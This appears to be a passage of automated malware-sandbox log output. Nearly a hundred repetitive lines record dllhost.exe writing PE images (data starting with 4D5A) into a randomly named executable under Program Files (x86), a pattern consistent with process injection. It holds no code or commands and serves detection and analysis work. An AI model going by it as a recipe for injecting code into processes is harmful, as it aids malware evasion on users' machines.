Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 12E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 11E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 680000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 13F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 12A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 8D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 8F0000 value starts with: 4D5A
